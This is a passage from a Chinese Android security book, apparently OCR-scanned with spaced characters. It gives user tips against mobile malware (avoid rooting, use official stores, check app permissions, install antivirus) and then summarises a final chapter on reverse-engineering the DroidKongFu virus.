病毒 程序 未 经 用 户 同 意 ， 恶 意 的 下 载 广告 软件 、 发 送 扣 费 短信 、 上 传 
用 户 隐 私 数据 ， 给 用 户 带 来 巨大 的 经 济 损失 。 如 何 有 效 地 防治 病毒 ， 已 经 
成 为 Android 手 机 用 户 必 须 掌 握 的 知识 。 笔 者 在 此 提出 几 点 建议 : 

1。 不 要 轻易 ROOT 自己 的 手机 。 

root 权 限 对 于 软件 来 说 ， 拥 有 系统 绝对 的 控制 权 。 这 种 情况 下 ， 手 机 中 
所 有 的 数据 都 是 暴露 的 ， 任 何 程 序 都 可 以 访问 系统 中 所 有 的 数据 ， 病 毒 程 
序 更 会 在 这 种 情况 下 对 系统 进行 肆意 的 破坏 。 

2. 到 正规 的 应 用 商店 下 载 软 件 

Android 系 统 的 开放 性 造就 了 国内 的 Android 软 件 市 场 ， 据 不 完全 统计 ， 
国内 的 Android 软 件 市 场 已 有 上 百 家 ， 这 些 市 场 中 提供 的 软件 名 目 繁多 ， 质 
量 参差 不 齐 ， 其 中 就 不 乏 一 些 病 毒 软件 充斥 其 中 ， 用 户 很 难 通过 软件 名 来 
判断 是 否 为 恶意 程序 ， 安 装 这 些 软件 随时 面临 着 手机 中 毒 的 危险 ， 因 此 ， 
笔者 建议 下 载 软件 时 最 好 先 去 Google Play 商店 找 找 ， 如 果 没有 ， 可 以 党 试 
搜索 软件 的 官方 网 站 ， 最 后 实在 找 不 到 就 去 国内 知名 度 较 高 的 Android 市 场 
下 载 ， 这 样 可 以 大 大 降低 手机 中 毒 的 几率 。 

3. 安装 软件 留心 眼 

手动 安装 软件 时 ， 安 装 界面 会 显示 将 要 安装 的 软件 使 用 到 的 权限 ， 这 
些 权 限 中 一 部 分 就 是 和 手机 扣 费 相关 的 ， 在 安装 时 需要 留 个 心眼 。 比 如 ， 
下 载 安 装 一 个 新 闻 阅 读 软 件 ， 里 面 却 使 用 到 了 短信 发 送 的 权限 ， 这 很 显然 
是 不 合理 的 ， 这 个 时 候 就 需要 谨慎 了 ， 可 以 选择 放弃 安装 ， 或 者 上 传 到 在 
线 沙 盒 中 测试 一 下 ， 当 然 ， 也 可 以 使 用 本 书 讲 到 的 技术 来 反 编译 该 软件 ， 
看 看 是 否 有 恶意 发 送 扣 费 短信 的 行为 。 

4. 安装 防 病毒 软件 

防 病毒 软件 是 手机 安全 的 最 后 一 道 屏 障 。 虽 然 不 指望 这 些 软件 能 够 对 
未 知 的 病毒 进行 预警 ， 但 它们 中 的 大 部 分 还 是 可 以 查 杀 已 知 病毒 的 ， 并 


H, 一 些 防 病毒 软件 还 提供 了 系统 敏感 数据 的 监控 功能 ， 可 以 及 时 地 对 系 
统 中 的 危险 操作 进行 提醒 。 另 外 ， 如 果 您 使 用 的 手机 已 经 ROOT 过 了 ， 那 么 
最 好 安装 带 主动 防御 功能 的 防 病毒 软件 ， 这 样 才 能 捕获 那些 比较 底层 且 难 
以 发 现 的 恶意 攻击 。 


12.7 ”本章 小 结 


本 章 是 本 书 的 最 后 一 章 ， 也 是 知识 总 结 的 一 章 。 本 章 主 要 通过 分 析 
DroidKongFu 变 种 病毒 从 Java 层 代码 到 Native 层 代码 的 整个 执行 过 程 ， 融 会 
贯通 全 书 涉及 到 的 知识 点 。 

12.4.1 节 讲解 的 Java 层 启动 代码 分 析 ， 主 要 是 针对 本 书 一 至 五 章 的 内 
容 。 分 析 Java 程 序 的 反 汇 编 代 码 是 研究 Android 软 件 安全 的 基础 知识 ， 读 者 
在 使 用 jd-gui 来 阅读 反 编 译 出 的 Java 代 码 前 ， 需 要 多 阅读 反 汇 编 出 的 smali 代 
码 ， 理 解 它们 的 含义 ， 养 成 多 读 、 多 练 的 好 习惯 。12.4.2 节 与 12.4.3 节 主要 
讲解 的 是 ARM 反 汇编 代码 的 阅读 ， 主 要 是 针对 本 书 第 六 章 至 八 章 的 内 容 。 
阅读 ARM 反 汇编 代码 是 本 书 的 难点 ， 也 是 本 书 的 重点 ，ARM 反 汇编 代码 的 
阅读 能 力 直 接 决定 了 分 析 人 员 逆 向 分 析 的 水 平 。 要 想 提 高 自己 的 分 析 水 
平 ， 没 有 捷径 可 走 ， 除 了 对 编程 知识 的 了 解 外 ， 更 多 的 就 是 多 动手 分 析 实 
例 程序 ， 多 阅读 反 汇 编 代码 。 

最 后 ， 真 心 希望 读者 能 够 通过 本 书 学 习 到 想 要 了 解 的 知识 ， 读 者 在 阅 
读本 书 过 程 中 ， 有 任何 的 疑问 ， 或 发 现 书 中 有 描述 错误 的 地 方 ， 欢 迎 来 
言 ， 笔 者 的 邮箱 是 fei_cong@hotmail.como 


